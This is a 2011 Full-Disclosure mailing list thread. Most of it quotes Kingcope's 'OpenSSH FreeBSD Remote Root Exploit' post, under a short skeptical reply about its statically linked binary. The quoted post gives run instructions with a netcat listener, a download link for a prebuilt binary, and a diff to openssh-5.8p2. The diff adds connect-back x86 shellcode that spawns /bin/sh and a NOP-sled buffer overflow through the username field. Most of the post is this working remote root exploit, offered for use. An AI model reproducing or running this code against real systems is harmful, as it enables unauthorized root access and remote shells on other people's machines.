you can apply the patch using the diff if you don't want to run that. 2011/7/1 Benji <me@xxxxxxxxx>: > So you want people to download your statically linked binary? > > On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . > <isowarez.isowarez.isowarez@xxxxxxxxxxxxxx> wrote: >> >> OpenSSH FreeBSD Remote Root Exploit >> By Kingcope >> Year 2011 >> >> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 >> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 >> run like ./ssh -1 -z <yourip> <target> >> setup a netcat, port 443 on yourip first >> >> a statically linked linux binary of the exploit can be found below >> attached is a diff to openssh-5.8p2. >> >> the statically linked binary can be downloaded from >> http://isowarez.de/ssh_0day >> >> I know these versions are really old, some seem to run >> that tough. >> >> -Cheers, King "the archaeologist" Cope >> >> diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c >> 149a150 >> > char *myip; >> 195a197,203 >> > "OpenSSH FreeBSD Remote Root Exploit\n" >> > "By Kingcope\n" >> > "Year 2011\n\n" >> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n" >> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n" >> > "run like ./ssh -1 -z <yourip> <target>\n" >> > "setup a netcat, port 443 on yourip first\n\n" >> 299c307 >> < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" >> --- >> > while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx" >> 335a344,346 >> > break; >> > case 'z': >> > myip = optarg; >> diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c >> 667a668,719 >> > //IP=\xc0\xa8\x20\x80 >> > #define IPADDR "\xc0\xa8\x20\x80" >> > #define PORT "\x27\x10" /* htons(10000) */ >> > >> > char sc[] = >> > "\x90\x90" >> > "\x90\x90" >> > "\x31\xc9" // xor ecx, ecx >> > "\xf7\xe1" // mul ecx >> > "\x51" // push ecx >> > "\x41" // inc ecx >> > "\x51" // push ecx >> > "\x41" // inc ecx >> > "\x51" // push ecx >> > "\x51" // push ecx >> > "\xb0\x61" // mov al, 97 >> > "\xcd\x80" // int 80h >> > "\x89\xc3" // mov ebx, eax >> > "\x68"IPADDR // push dword 0101017fh >> > "\x66\x68"PORT // push word 4135 >> > "\x66\x51" // push cx >> > "\x89\xe6" // mov esi, esp >> > "\xb2\x10" // mov dl, 16 >> > "\x52" // push edx >> > "\x56" // push esi >> > "\x50" // push eax >> > "\x50" // push eax >> > "\xb0\x62" // mov al, 98 >> > "\xcd\x80" // int 80h >> > "\x41" // inc ecx >> > "\xb0\x5a" // mov al, 90 >> > "\x49" // dec ecx >> > "\x51" // push ecx >> > "\x53" // push ebx >> > "\x53" // push ebx >> > "\xcd\x80" // int 80h >> > "\x41" // inc ecx >> > "\xe2\xf5" // loop -10 >> > "\x51" // push ecx >> > "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh >> > "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh >> > "\x89\xe3" // mov ebx, esp >> > "\x51" // push ecx >> > "\x54" // push esp >> > "\x53" // push ebx >> > "\x53" // push ebx >> > "\xb0\xc4\x34\xff" >> > "\xcd\x80"; // int 80h >> > >> > >> > extern char *myip; >> > >> 678a731,748 >> > >> > char buffer[100000]; >> > >> > printf("OpenSSH Remote Root Exploit\n"); >> > printf("By Kingcope\n"); >> > printf("Year 2011\n\n"); >> > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"); >> > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"); >> > printf("Connect back to: %s:443\n", myip); >> > >> > *((unsigned long*)(sc + 21)) = inet_addr(myip); >> > *((unsigned short*)(sc + 27)) = htons(443); >> > >> > memset(buffer, 'V', 8096); >> > memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // >> > SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 >> > memset(buffer+28, '\x90', 65535); >> > memcpy(buffer+28+65535, sc, sizeof(sc)); >> > server_user=buffer; >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > >
